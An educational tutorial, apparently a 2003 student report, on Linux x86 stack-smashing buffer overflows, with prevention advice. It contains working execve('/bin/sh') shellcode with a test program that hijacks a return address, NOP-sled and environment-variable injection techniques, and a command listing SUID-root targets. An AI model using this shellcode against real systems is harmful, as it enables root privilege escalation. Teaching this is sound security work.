Buffer Overflow Attack

Renjith Thomas

Copyright © 2003 by Renjith Thomas

Revision History
Revision 1.0, 15 Oct 2003. Revised by: RT

Table of Contents
Acknowledgement
1. Introduction
    Pre-requisites
    Linux File System Permissions
    Linux and the C programming language
2. What’s a Buffer Overflow?
    Memory layout
        Text Segment
        Data Segment
        Stack Segment
    EIP register, CALL & RET instructions
    ESP, EBP
    An Illustration
    A simple example
3. The Attack
    Shell Code
    How to execute /bin/sh ?
4. Creative stack smashing
    SUID root programs by distribution
5. Prevention and Security
    Finding Buffer Overflows
    Stack Smashing Prevention
        Program modification
        Compiler modifications
        CPU/OS kernel stack execution privilege
6. Conclusion
A. References



This document was prepared to give an overview of buffer overflows. I think I’m able to render some of it in this document. I am deeply indebted to the Head of the Computer Science Department, Dr. Agnisarman Namboodiri, for his support. I’m grateful to Prof. Zainul Abid for his valuable guidance and suggestions. I’m also grateful to all other faculty members of the Computer Science Department for their support. I gratefully remember all students of S7 CSE-B.




Chapter 1. Introduction
By combining the C programming language’s liberal approach to memory handling with specific Linux filesystem permissions, this operating system can be manipulated to grant unrestricted privilege to unprivileged accounts or users. A variety of exploit that relies upon these two factors is commonly known as a buffer overflow, or stack smashing vulnerability. Stack smashing plays an important role in high profile computer security incidents. In order to secure modern Linux systems, it is necessary to understand why stack smashing occurs and what one can do to prevent it.

To understand what goes on, some knowledge of C and assembly is required. Familiarity with virtual memory and some operating system essentials, for example how a process is laid out in memory, will be helpful. You MUST know what a setuid binary is, and of course you need to be able to, at least, use Linux systems. Experience with gdb and cc is a real advantage. This document is Linux/ix86 specific; the details differ depending on the operating system or architecture you’re using. Here, I have tried out some small buffer overflows that can be easily grasped. The pre-requisites described above are explained in some detail below.

Linux File System Permissions
In order to better understand stack smashing vulnerabilities, it is first necessary to understand certain features of filesystem permissions in the Linux operating system. Privileges in the Linux operating system are invested solely in the user root, sometimes called the superuser; root’s infallibility is expected under every condition, including program execution. The superuser is the main security weakness in the Linux operating system. Because the superuser can do anything, a person who gains superuser privileges (for example, by learning the root password and logging in as root) can do virtually anything to the system. This explains why most attackers who break into Linux systems try to become superusers.

Each program (process) started by the root user inherits the root user’s all-inclusive privilege. In most cases the inherited privilege is subsequently passed to other programs spawned by root’s running processes. Set UID (SUID) permissions in the Linux operating system grant a user the privilege to run a program as another user. In the Linux operating system, the process in memory that handles program execution is usually owned by the user who executed the program. Using a unique permission bit to indicate SUID, the filesystem tells the operating system that the program will run under the file owner’s ID rather than the ID of the user who executed it. Often SUID programs are owned by root; while these programs may be executable by an unprivileged user on the system, they run in memory with unrestricted access to the system. As one can see, SUID root permissions are used to grant an unprivileged user temporary, and necessary, use of privileged resources.

Many Linux programs need to run with superuser privileges. These programs are run as SUID root programs, at system boot, or as network servers. A single bug in any of these complicated programs can compromise the safety of your entire system. This characteristic is probably a design flaw, but it is basic to the design of Linux, and it is not likely to change. Exploitation of this “feature turned design flaw” is critical in constructing buffer overflow exploits.


Linux and the C programming language
The Linux operating system is inextricably linked to the C programming language. All modern implementations of the Linux operating system are written in the C programming language, including system binaries and the kernel. What C gains in simplicity and efficiency, it sacrifices in terms of data integrity and ease of use. The standard C library in most Linux implementations offers no protection against buffer overflows and memory leaks. This is not to be interpreted as an error in the design of the language: C assumes the programmer is responsible for data integrity. Once a variable is allocated memory space in C, the language does nothing to ensure that the expected contents of the variable fit into the allocated memory.

C programmers often use the terms buffer and array interchangeably; thus, it is safe to define a buffer as a contiguous block of memory (core) that holds multiple instances of an identical data type. As with all variables in C, buffers are declared dynamic or static. Static buffers are explicitly defined in the source code and are allocated at load time in the data segment in memory. Dynamic buffers (automatic variables, in C terms) are declared inside functions and are allocated at run time on the stack. Due to the obvious limitations of static arrays, dynamic allocation is the method used in all major programs and applications in the Linux environment. Thus, stack smashing, or stack overflow, exploits are concerned only with buffers that are allocated on the stack.


Chapter 2. What’s a Buffer Overflow?
Memory layout
If you know C, you most probably know what a character array is. Assuming that you code in C, you should already know the basic properties of arrays: an array holds objects of the same type, e.g. int, char, or float. Just like all other data structures, arrays can be classified as either "static" or "dynamic". Static variables are loaded into the data segment of the program, whereas dynamic variables are allocated and deallocated within the stack region of the executable in memory. "Stack-based" buffer overflows occur here: we stuff more data into a data structure, say an array, than it can hold, exceed the boundaries of the array, and overwrite many important data. Simply put, it is copying 20 bytes to an array that can handle only 12 bytes.

The memory layout of a Linux ELF binary is quite complex. It has become even more complex since ELF ("Executable and Linkable Format") and shared libraries were introduced. However, basically, every process starts running with 3 segments:

Text Segment
The Text Segment is a read-only part that includes all the program instructions. For example, the assembly instructions equivalent to the C code below are included in this segment:
for (i = 0; i < 10; i++) s += i;

Data Segment
The Data Segment is the block where initialized and uninitialized data (the latter is also known as BSS) are stored. For example, if you code, at file scope:
int i;

the variable is uninitialized, and it’ll be stored in the "uninitialized variables" part of the Data Segment (BSS). And if you code:
int j = 5;

the variable is initialized, and the space for the j variable will be allocated in the "initialized variables" part of the Data Segment.

Stack Segment
The Stack is the segment where dynamic variables (or, in C jargon, automatic variables) are allocated and deallocated, and where return addresses for functions are stored temporarily. For example, in the following code snippet, the i variable is created on the stack and is destroyed as soon as the function returns:
#include <stdio.h>

int myfunc(void)
{
    int i;                      /* automatic variable: lives on the stack */

    for (i = 0; i < 10; i++)
        putchar('*');
    putchar('\n');
    return 0;
}

If we are to symbolize the stack:
0xBFFFFFFF  ---------------------
            |         .         |
            |         .         |
            |         .         |
            |         .         |
            |        etc        |
            | env/argv pointer. |
            |       argc        |
            |-------------------|
            |                   |
            |       stack       |
            |                   |
            |         |         |
            |         |         |
            |         V         |
            /                   /
            \                   \
            |         ^         |
            |         |         |
            |         |         |
            |       heap        |
            |-------------------|
            |        bss        |
            |-------------------|
            | initialized data  |
            |-------------------|
            |       text        |
            |-------------------|
            | shared libraries  |
            |       etc.        |
0x8000000   |-------------------|

_* STACK *_

The stack is, in basic terms, a data structure that all of you will remember from your Data Structures courses. It has the same basic operation: it’s a LIFO (Last-In, First-Out) data structure. Its operations are controlled directly by the CPU via special instructions such as PUSH and POP. You PUSH some data onto the stack, and POP some other data. Whoever comes in LAST is the one who goes out FIRST. So, in technical terms, the first item to be popped from the stack is the one that was pushed last.

The SP (Stack Pointer) register on the CPU contains the address of the data that will be popped from the stack. Whether SP points to the last data or to the slot after the last data on the stack is CPU-specific; on the ix86 architecture, which is our subject, SP points to the address of the last data on the stack. In ix86 protected mode (32 bit/double word), PUSH and POP instructions operate in 4-byte units. Another important detail to be noted here is that the stack grows downward: if SP is 0x100, just after a PUSH EAX instruction SP will become 0xFC and the value of EAX will be placed at address 0xFC.

The PUSH instruction subtracts 4 from ESP (remember the paragraph above) and pushes a double word onto the stack, placing the double word at the address pointed to by the ESP register. The POP instruction, on the other hand, reads the address in the ESP register, POPs the value stored at that address from the stack, and adds 4 to ESP (adds 4 to the address in the ESP register). Assuming that ESP is initially 0x1000, let’s examine the following assembly code:
PUSH dword1 ;value at dword1: 1, ESP's value: 0xFFC (0x1000-4)
PUSH dword2 ;value at dword2: 2, ESP's value: 0xFF8 (0xFFC-4)
PUSH dword3 ;value at dword3: 3, ESP's value: 0xFF4 (0xFF8-4)
POP EAX     ;EAX's value: 3, ESP's value: 0xFF8 (0xFF4+4)
POP EBX     ;EBX's value: 2, ESP's value: 0xFFC (0xFF8+4)
POP ECX     ;ECX's value: 1, ESP's value: 0x1000 (0xFFC+4)

The stack, while being used as temporary storage for dynamic variables, is also used to store the return addresses of function calls and to pass parameters to functions. And, of course, this is where evil things come into play.

EIP register, CALL & RET instructions
In each machine cycle, the CPU looks at what’s stored in the Instruction Pointer register (in ix86 32-bit protected mode this is EIP, the Extended Instruction Pointer) to know what to execute next. The EIP register holds the address of the instruction that will be executed next. Usually, the addresses are sequential, meaning the next instruction to be executed is a few bytes ahead of the current instruction in memory. The CPU calculates that "few bytes" from the length of the current instruction, and adds that value to the address of the current instruction. To illustrate, assume that the current instruction’s address is 0x8048438. This is the value that’s written in EIP, so the CPU is executing the instruction found at memory location 0x8048438. Say it’s a PUSH instruction:
push %ebp

CPU knows that a PUSH instruction is 1 byte long, so the next instruction will be at 0x8048439, which may be
mov %esp,%ebp

While executing the PUSH, the CPU will put the address of the MOV in EIP. Okay, we said that the values put in EIP are calculated by the CPU itself. What if we JMP to a function? The instructions of the function will be somewhere else in memory. After they are executed, how can the CPU know where to resume execution in the calling procedure? For this, just before we JMP to the function, we save the address of the next instruction in a temporary register, say EDX; and before returning from the function we write the address in EDX back to EIP. If we used JMP to jump to the addresses of functions, that would be very tiresome work.

However, the ix86 processor family provides us with two instructions, CALL and RET, that make our lives easy! The CALL instruction writes the address of the "next instruction to be executed after the function returns" (from now on, we’ll call this the "return address") to the stack: it PUSHes it onto the stack, and then writes the address of the function to EIP. Thus, a function call is made. The RET instruction, on the other hand, POPs the "return address" from the stack and writes that address to EIP. Thus we safely return from the function and continue with the program’s next instruction. Let’s have a look at the following code snippet:
x = 0;
function(1, 2, 3);
x = 1;

After the several assembly instructions for (x = 0) have been run, we need to go to the memory location where function() is located. As we said earlier, for this to happen, we first copy the return address (the address of the x = 1 instructions in this case) to some temporary space (it might be a register), jump to the address of the function with JMP, and at the end of the function restore the return address that we’d copied to EIP. All these dirty operations are done on our behalf by the CPU itself via CALL and RET, as detailed in the paragraph above. Generally, the stack region of the program can be symbolized like this:
|_parameter_I____|  ESP+8
|_parameter II___|  ESP+4
|_return address_|  ESP

The stack, as we’ve said, is also used to store dynamic variables. The CPU PUSHes some data as the program requests new space, and POPs other data when our program releases it. To address the memory locations, we use "relative addressing": we address the locations of data in our stack relative to some reference point. This reference point is ESP, the Extended Stack Pointer. This register points to the top of the stack. Consider this:
void f() { int a; }

As you can see, in the f() function we allocate space for an integer variable named a. The space for a will be allocated on the stack, and the computer will reference its address relative to ESP. So the stack pointer is quite crucial for program execution. What if we call a function? The calling function has a stack frame with some local variables, meaning it uses the stack pointer register. The function that is called will also have local variables, and it’ll need the stack pointer too. To overcome this, we save the caller’s frame reference. Just like we did for the return address, we PUSH the old value of EBP onto the stack, copy the current ESP into EBP, and then use EBP to reference local variables in the callee relative to it.

And this is the symbolization of the stack once the old EBP is also PUSHed onto the stack:
|_parameter_I___|  EBP+12
|_parameter II__|  EBP+8
|_return address|  EBP+4
|___saved_EBP___|  EBP
|_local var I __|  EBP-4
|_local var II__|  EBP-8


In the above picture, parameter I and II are the arguments passed to the function. Below the return address and the saved EBP, local var I and II are the local variables of the function. Now, to sum up all we said, when calling a function:
1. We save the address of the next instruction (the return address), PUSHing it onto the stack.
2. We save the caller’s frame pointer (the old EBP), PUSHing it onto the stack.
3. And we start executing the instructions of the function.

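These 3 steps take place every time we CALL a subroutine, say a function: the CALL instruction itself saves the return address, and the first instructions of the called function save the old frame pointer.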

An Illustration
Let’s see the operation of the stack, and procedure prologue in a live example:
void fun(int a, int b, int c)
{
    char z[4];
}

void main()
{
    fun(1, 2, 3);
}

Compile this with the -g flag to enable debugging:
$ gcc -g a.c -o a
Let’s see what happened there:
$ gdb -q ./a
(gdb) disassemble main
Dump of assembler code for function main:
0x8048448 <main>:       pushl  %ebp
0x8048449 <main+1>:     movl   %esp,%ebp
0x804844b <main+3>:     pushl  $0x3
0x804844d <main+5>:     pushl  $0x2
0x804844f <main+7>:     pushl  $0x1
0x8048451 <main+9>:     call   0x8048440 <fun>
0x8048456 <main+14>:    addl   $0xc,%esp
0x8048459 <main+17>:    leave
0x804845a <main+18>:    ret
End of assembler dump.
(gdb)

As you can see above, in main() the first instruction is:
0x8048448 <main>: pushl %ebp

which backs up the caller’s frame pointer (the old EBP) by pushing it onto the stack.

Then we copy the current stack pointer to the EBP register:
0x8048449 <main+1>: movl %esp,%ebp

Thus, from then on, in the function, we’ll reference function’s local variables with EBP. These two instructions are called the "Procedure Prologue". Then, we PUSH the function fun()’s arguments onto the stack in reverse order:
0x804844b <main+3>:     pushl  $0x3
0x804844d <main+5>:     pushl  $0x2
0x804844f <main+7>:     pushl  $0x1

We call the function:
0x8048451 <main+9>: call 0x8048440 <fun>

As I’ve explained, by CALLing we PUSHed the address of the next instruction, addl $0xc,%esp at 0x8048456, onto the stack. After the function RETurns, we add 12 (0xc in hex) to ESP, since we pushed 3 arguments onto the stack, each occupying 4 bytes (integers). Then we leave the main() function and return:
0x8048459 <main+17>:    leave
0x804845a <main+18>:    ret

Ok, what happened inside the function fun() ?:
(gdb) disassemble fun
Dump of assembler code for function fun:
0x8048440 <fun>:        pushl  %ebp
0x8048441 <fun+1>:      movl   %esp,%ebp
0x8048443 <fun+3>:      subl   $0x4,%esp
0x8048446 <fun+6>:      leave
0x8048447 <fun+7>:      ret
End of assembler dump.
(gdb)

The first two instructions are just the same: they are the procedure prologue. Then we see:
0x8048443 <fun+3>: subl $0x4,%esp

which subtracts 4 bytes from ESP. This allocates space for the local variable z. We declared it as char z[4], remember? It is a 4-byte character array. And, at the end, the function returns:
0x8048446 <fun+6>:      leave
0x8048447 <fun+7>:      ret



A simple example
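#include <string.h>

void fun(char *str)
{
    char foo[16];

    strcpy(foo, str);           /* no bounds check: copies past the end of foo */
}

int main(void)
{
    char large_one[256];

    memset(large_one, 'A', 255);
    large_one[255] = '\0';      /* terminate the string so strcpy() stops here */
    fun(large_one);
    return 0;
}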

$ cc -W -Wall -pedantic -g c.c -o c
$ ./c
Segmentation fault (core dumped)

What we do above is simply write 255 bytes into an array that can hold only 16 bytes. We passed a large array of 256 bytes as a parameter to the fun() function. Within the function, without bounds checking, we copied the whole of large_one into foo, overflowing foo and the data beyond it. Thus the buffer was filled, and strcpy() also filled other portions of memory, including the return address, with A. Here is the inspection of the generated core file with gdb:
$ gdb -q c core
Core was generated by `./c'.
Program terminated with signal 11, Segmentation fault.
find_solib: Can't read pathname for load map: Input/output error
#0  0x41414141 in ?? ()
(gdb)

As you can see, the CPU saw 0x41414141 (0x41 is the hex ASCII code for the letter A) in EIP, and tried to access and execute the instruction located there. However, 0x41414141 was not a memory address that our program was allowed to access. In the end, the OS sent a SIGSEGV (Segmentation Violation) signal to the program and stopped any further execution. When we called fun(), the stack looked like this:
|______*str______|  EBP+8
|_return address_|  EBP+4
|___saved_EBP____|  EBP
|______foo1______|  EBP-4
|______foo1______|  EBP-8
|______foo1______|  EBP-12
|______foo1______|  EBP-16


strcpy() copied large_one to foo without bounds checking, filling the whole stack with A, starting from the beginning of foo at EBP-16. Now that we can overwrite the return address, if we put the address of some other memory location there, can we execute the instructions at that location? The answer is yes.

Assume that we place some /bin/sh spawning instructions at some memory address, and we put that address in the function’s return address slot that we overflow. We can then spawn a shell, and most probably a root shell, since we are interested in setuid binaries.


Chapter 3. The Attack
Shell Code
As shown in the previous section, by manipulating dynamically allocated variables with unbounded byte copy operations, execution of arbitrary code is possible via the return address blindly ‘restored’ following a function exit. The ability to execute arbitrary code as the superuser is often used with calls that allow an attacker to continue executing an indefinite number of commands as root. To obtain maximum root system privilege, the interactive Bourne shell program, /bin/sh, is spawned. The Bourne shell exists on every modern UNIX system, and is commonly the default system shell for the privileged user. Any system shell can be used as shell code; however, in the interest of keeping this study as generic as possible, /bin/sh is assumed.

In order to arrange an interactive shell situation, a static /bin/sh execution sequence must appear somewhere in memory so that a manipulated ‘return address’ can point to that location. This is accomplished by using an assembly language hexadecimal string of the binary equivalent to the standard C function call execve(name[0], name, NULL), where name[0] points to the string "/bin/sh". Assembly language equivalents to this call are hardware implementation dependent. Using debugging utilities, it is possible to dissect a call such as execve(name[0], name, NULL) by breaking it down into a simple assembly sequence, and storing its bytes in a character array or other contiguous data structure. On an Intel x86 machine running Linux, the following steps are used in formulating shell code:
1. The null terminated string /bin/sh exists somewhere in memory.
2. The address of the string /bin/sh exists somewhere in memory, followed by a null long word.
3. 0xb is copied into the EAX register.
4. The address of the string /bin/sh is copied into the EBX register.
5. The address of the address of the string /bin/sh is copied into the ECX register.
6. The address of the null long word is copied into the EDX register.
7. The int $0x80 instruction is executed, a standard Intel CPU interrupt.
8. 0x1 is copied into the EAX register.
9. 0x0 is copied into the EBX register.
10. The int $0x80 instruction is executed, a standard Intel CPU interrupt.

This listing can be reduced to actual x86 shell code in a standard ANSI C character array.

How to execute /bin/sh ?
In C, the code to spawn a shell would be like this:
#include <unistd.h>

void main()
{
    char *shell[2];

    shell[0] = "/bin/sh";
    shell[1] = NULL;
    execve(shell[0], shell, NULL);
}

$ cc -W -Wall -pedantic -g shell.c -o shell
$ ./shell
bash$

If you look at the man page of execve, you’ll see that execve expects a pointer to the filename to be executed, a NULL terminated array of arguments, and an environment pointer, which can be NULL. If you compile and run the output binary, you’ll see that you spawn a new shell. So far so good... But we cannot spawn a shell this way inside another program, right? How can we send this code to the vulnerable program? We can’t! This poses a new question: how can we pass our evil code to the vulnerable program? We will need to pass our code, which will possibly be shell code, in the vulnerable buffer. For this to happen, we have to be able to represent our shell code as a string. Thus we’ll list all the assembly instructions needed to spawn a shell, get their opcodes, list them one by one, and assemble them into a shell spawning string. First, let’s see how the above code looks in assembly. Let’s compile the program as static (this way, the execve system call will also be disassembled) and see:
$ gcc -static -g -o shell shell.c
$ objdump -d shell | grep \<__execve\>: -A 12
0804ca10 <__execve>:
 804ca10:  53                 pushl  %ebx
 804ca11:  8b 54 24 10        movl   0x10(%esp,1),%edx
 804ca15:  8b 4c 24 0c        movl   0xc(%esp,1),%ecx
 804ca19:  8b 5c 24 08        movl   0x8(%esp,1),%ebx
 804ca1d:  b8 0b 00 00 00     movl   $0xb,%eax
 804ca22:  cd 80              int    $0x80
 804ca24:  5b                 popl   %ebx
 804ca25:  3d 01 f0 ff ff     cmpl   $0xfffff001,%eax
 804ca2a:  0f 83 00 02 00     jae    804cc30 <__syscall_error>
 804ca2f:  00
 804ca30:  c3                 ret
 804ca31:  90                 nop

Let’s analyze the syscall step by step: Remember, in our main() function, we coded:
execve(shell[0], shell, NULL)

We passed: the address of string "/bin/sh", the address of NULL terminated array, NULL (in fact it is env address). Here in the main:
$ objdump -d shell | grep \<main\>: -A 17
08048124 <main>:
 8048124:  55                 pushl  %ebp
 8048125:  89 e5              movl   %esp,%ebp
 8048127:  83 ec 08           subl   $0x8,%esp
 804812a:  c7 45 f8 ac 92     movl   $0x80592ac,0xfffffff8(%ebp)
 804812f:  05 08
 8048131:  c7 45 fc 00 00     movl   $0x0,0xfffffffc(%ebp)
 8048136:  00 00
 8048138:  6a 00              pushl  $0x0
 804813a:  8d 45 f8           leal   0xfffffff8(%ebp),%eax
 804813d:  50                 pushl  %eax
 804813e:  8b 45 f8           movl   0xfffffff8(%ebp),%eax
 8048141:  50                 pushl  %eax
 8048142:  e8 c9 48 00 00     call   804ca10 <__execve>
 8048147:  83 c4 0c           addl   $0xc,%esp
 804814a:  c9                 leave
 804814b:  c3                 ret
 804814c:  90                 nop

Before the call to execve (call 804ca10 <__execve>), we pushed the arguments onto the stack in reverse order. So, if we turn back to __execve: we copy the NULL to the EDX register, we copy the address of the NULL terminated array into the ECX register, we copy the address of the string "/bin/sh" into the EBX register, and we copy the syscall index for execve, which is 11 (0xb), to the EAX register. Then we change into kernel mode. This is all we need. However, there is a problem here: we cannot know exactly the addresses of the NULL terminated array and of the string "/bin/sh". So, how about this?:
xorl  %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl  %esp,%ebx
pushl %eax
pushl %ebx
movl  %esp,%ecx
cdql
movb  $0x0b,%al
int   $0x80

Let’s try to explain the above instructions: if you xor something with itself, you get 0, the equivalent of NULL. Here, we get a NULL in the EAX register. Then we push the NULL onto the stack. We push the string "//sh" onto the stack (the doubled slash pads the string to 4 bytes and is harmless in a path):
2f is /
2f is /
73 is s
68 is h
pushl $0x68732f2f


We push string "/bin" onto the stack:
2f is /
62 is b
69 is i
6e is n
pushl $0x6e69622f

As you can guess, the stack pointer now holds the address of our NULL terminated string "/bin//sh", because, starting from the stack pointer, which points to the top of the stack, we have a NULL terminated character array. So, we copy the stack pointer to the EBX register. See, we have already placed the address of "/bin/sh" into the EBX register:
movl %esp,%ebx



Then we need to set ECX to the NULL terminated array’s address. To do this, we create a NULL terminated array on our stack, very similar to the one above. First we PUSH a NULL. We can’t PUSH a literal NULL, but we can PUSH something that holds NULL: remember that we xor’d the EAX register and have NULL there, so let’s PUSH EAX to get a NULL on the stack:
pushl %eax

Then we PUSH the address of our string onto the stack; this is the equivalent of shell[0]:
pushl %ebx

Now that we have a NULL terminated array of pointers, we can save its address in ECX:
movl %esp,%ecx

What else do we need? A NULL in the EDX register. We could movl %eax, %edx, but we can do this operation with a shorter instruction: cdq. This instruction sign-extends what’s in EAX into EDX; since EAX is 0, EDX becomes 0 too:
cdql

We set EAX to 0xb, which is the syscall id of execve in the system call table:
movb $0x0b,%al

Then, we change into kernel mode:
int $0x80

After we go into kernel mode, the kernel will exec what we instructed it to: /bin/sh, and we will enter an interactive shell... So, after this much philosophy, all we need is to convert these asm instructions into a string. So, let’s get the hexadecimal opcodes and assemble our evil code. Here we put our evil code in the character array sc[]. Let’s test our shell code:
char sc[] =             /* 24 bytes */
    "\x31\xc0"          /* xorl  %eax,%eax   */
    "\x50"              /* pushl %eax        */
    "\x68""//sh"        /* pushl $0x68732f2f */
    "\x68""/bin"        /* pushl $0x6e69622f */
    "\x89\xe3"          /* movl  %esp,%ebx   */
    "\x50"              /* pushl %eax        */
    "\x53"              /* pushl %ebx        */
    "\x89\xe1"          /* movl  %esp,%ecx   */
    "\x99"              /* cdql              */
    "\xb0\x0b"          /* movb  $0x0b,%al   */
    "\xcd\x80"          /* int   $0x80       */
;

main()
{
    int *ret;

    ret = (int *)&ret + 2;      /* step over ret and the saved frame pointer */
    *ret = (int)sc;             /* overwrite main()'s return address */
}



$ gcc -g -o shellcode shellcode.c
$ ./shellcode
bash$

Hmm, it works. What we’ve done above is advance the address of ret (which is a pointer to integer) by 2 double words (8 bytes), thus reaching the memory location where main()’s return address is stored. Then, because ret now points at the return address, we stored the address of sc (which is our evil code) through ret. In effect, we changed the value of the return address: it then pointed to sc[]. When main() issued RET, sc’s address was written to EIP and, consequently, the CPU started executing the instructions there, resulting in the execution of /bin/sh.




Chapter 4. Creative stack smashing
SUID root programs included in Linux distributions are not precompiled with “shell code” as part of the binary. To exploit these types of programs, some means must be used to insert the shellcode array into the runtime environment. Stack smashers have devised creative ways to accomplish this. In order to inject the shell code into the running process, stack smashers have manipulated command line arguments, shell environment variables, and interactive input functions with the necessary shell code sequence. Not only do most stack smashing exploits rely upon shell code to accomplish their task, but these types of exploits also depend on knowing at what address in memory this shell code will reside. Taking this into consideration, many stack smashers have padded their shell code with NOP (no-operation) assembly instructions; this gives the shell code a ‘wider space’ in memory and makes it easier to guess where the shell code may be when manipulating the return address. This approach, combined with an approach whereby the shell code is followed by many instances of the ‘guessed’ return address in memory, is a common strategy used in constructing stack smashing exploits. An additional approach, when small programs with memory restrictions are exploited, is to store the shellcode in an environment variable.

SUID root programs by distribution
In order to search standard Linux distributions for SUID root programs, the following command can be executed by the privileged user:

/usr/bin/find / -user root -perm -004000 -print

This command performs a system-wide search for SUID root files, which, as described, are crucial in constructing stack smashing exploits. On a Linux machine running the 2.0.30 kernel, built from a modified version of the Slackware distribution, 56 SUID root world-executable binaries existed on the system. A subtle byte copying error in any one of these programs could allow for a stack smashing vulnerability. Comparatively, a distribution of the Solaris operating system contained approximately 67 SUID root world-executable programs in total [12]. As with the Linux distribution, an error in the code that handles dynamic string variables in any one of these system binaries could allow for a stack smashing vulnerability. Using Linux and Solaris as examples, one may conclude that a significant number of SUID root binaries exist in the typical Linux distribution. Any one of these programs can become a target for stack smashers, so prevention and protection of these files is a necessity.
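The test that the search applies to each file can also be expressed in C. The following is a minimal sketch, assuming a POSIX system; the function names is_suid_root and path_is_suid_root are hypothetical and are not taken from any existing tool.

```c
#define _POSIX_C_SOURCE 200809L   /* makes lstat() visible under strict compiler modes */
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/stat.h>

/* True when the stat record describes a file owned by root (UID 0)
 * that has the set-user-ID bit (mode 04000) set. */
bool is_suid_root(const struct stat *st)
{
    assert(st != NULL);
    return st->st_uid == 0 && (st->st_mode & S_ISUID) != 0;
}

/* Hypothetical convenience wrapper: looks the file up with lstat(), so
 * symbolic links are not followed. Returns false if the lookup fails. */
bool path_is_suid_root(const char *path)
{
    struct stat st;

    assert(path != NULL);
    if (lstat(path, &st) != 0)
        return false;
    return is_suid_root(&st);
}
```

A program that walks the filesystem and calls path_is_suid_root() on each entry would produce a list comparable to the one described here.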



Chapter 5. Prevention and Security
Finding Buffer Overflows
As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. Since C does not have any built-in bounds checking, overflows often manifest themselves as writing past the end of a character array. The standard C library provides a number of functions for copying or appending strings that perform no boundary checking. They include strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings and do not check for overflow of the receiving string.

gets() is a function that reads a line from stdin into a buffer until either a terminating newline or EOF is reached. It performs no checks for buffer overflows. The scanf() family of functions can also be a problem if you are matching a sequence of non-white-space characters (%s) or a non-empty sequence of characters from a specified set (%[]), the array pointed to by the char pointer is not large enough to accept the whole sequence of characters, and you have not defined the optional maximum field width. If the target of any of these functions is a buffer of static size, and its other argument was somehow derived from user input, there is a good possibility that you might be able to exploit a buffer overflow.

Another common programming construct is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there are no explicit checks for overflows in the while loop, such programs are easily exploited.

To conclude, grep is your friend. The sources for free operating systems and their utilities are readily available. This fact becomes quite interesting once you realize that many commercial operating system utilities were derived from the same sources as the free ones.
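For contrast, a character-at-a-time loop with an explicit overflow check might look like the sketch below. The function name read_line_bounded and its return convention are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Reads one line from `in` into `buf`, storing at most size - 1 characters
 * and always NUL-terminating. Excess characters on the line are discarded.
 * Returns the number of characters stored, or -1 at EOF with nothing read. */
long read_line_bounded(FILE *in, char *buf, size_t size)
{
    assert(in != NULL && buf != NULL && size > 0);

    size_t n = 0;
    int saw_any = 0;
    int c;

    while ((c = getc(in)) != EOF && c != '\n') {
        saw_any = 1;
        if (n < size - 1)        /* the explicit overflow check */
            buf[n++] = (char)c;
    }
    buf[n] = '\0';

    if (c == EOF && !saw_any)
        return -1;
    return (long)n;
}
```

For the scanf() family the equivalent safeguard is the maximum field width, for example "%15s" when the destination array holds 16 bytes.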

Stack Smashing Prevention
Either a centralized or a decentralized approach can be taken to avoid stack smashing security vulnerabilities. To do so, changes must be implemented in the privileged programs themselves, in the C programming language compilers, or in the operating system kernel. A centralized approach involves modification of system libraries and/or the operating system kernel, while a decentralized approach involves modification of privileged programs and/or C compilers. Of these two basic approaches, a decentralized approach is more immediately expensive with respect to manpower and workload, but cheaper in the long term, providing a stable, long-lasting solution. A centralized approach is cheaper in the short term with respect to manpower and workload, but is nearly impossible to implement as a long-term solution.

Program modification
To effectively fix a defective SUID root program, a number of modifications can be made to the program’s source code to avoid stack smashing vulnerabilities. Standard C byte copy or concatenation functions are crucial in most buffer overflow exploits. A list of vulnerable function calls in the C programming language, with a suitable replacement function where one is available, is as follows:
function        suitable replacement
gets()          fgets()
sprintf()
strcat()        strncat()
strcpy()        strncpy()
streadd()
strecpy()
strtrns()
index()
fscanf()
scanf()
sscanf()
vsprintf()
realpath()
getopt()
getpass()
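The replacements only help when they are given the correct size and the result is terminated. The following is a minimal sketch of how strncpy() and strncat() might be wrapped; the helper names copy_bounded and append_bounded are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies src into dst (capacity dst_size) with strncpy(), then terminates
 * explicitly, because strncpy() adds no NUL when src fills the buffer. */
void copy_bounded(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL && dst_size > 0);
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
}

/* Appends src to the NUL-terminated string in dst without exceeding
 * dst_size. strncat() takes the number of characters to append, not the
 * buffer size, so the remaining space is computed first. */
void append_bounded(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL && dst_size > 0);

    size_t used = strlen(dst);
    assert(used < dst_size);     /* dst must already hold a valid string */

    strncat(dst, src, dst_size - used - 1);
}
```

In the same spirit, a call such as fgets(buf, sizeof buf, stdin) takes the place of gets(buf), since fgets() is told how large the buffer is.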

In general, functions that return a pointer to a result in static storage can be used in stack smashing exploits. In other terms, standard C function calls that copy strings without checking their length are insecure. Some vulnerable functions have suitable ‘drop in’ replacements; others do not. Whenever possible, alternative functions must be used to help ensure that privileged code is not susceptible to stack smashing exploits. In addition to using suitable replacements for vulnerable functions, shell environment pointers and excessive command line arguments also need to be checked for invalid data. Recall that stack smashers are creative and often hide shell code and other crucial exploit information in excessive command line arguments or environment variables. Thus, securing source code must be a comprehensive process to be effective, and all avenues of unauthorized input must be inspected and rejected if invalid.

Commercial programs such as CenterLine Software’s CodeCenter or Pure Atria’s Purify, and noncommercial programs such as Brian Marick’s GCT or Bruce Perens’ Electric Fence, can be used to assist programmers in locating buffer overflows and illegal function operations that standard C compilers do not look for. However, programs such as these can only catch overflow bugs reactively, not proactively; a test case must exist which provokes the stack smashing hole. Many of these programs can offer more information than standard Linux facilities while investigating a program’s abnormal memory operations. As C debugging tools, they may offer more than simple ‘segmentation violation’ messages. However, it is important to remember that these programs are designed to remove bugs and do not specialize in security. Furthermore, they do not consider the current or future filesystem permissions of the program: the same battery of tests is submitted to a program whether it runs as a privileged user or not.
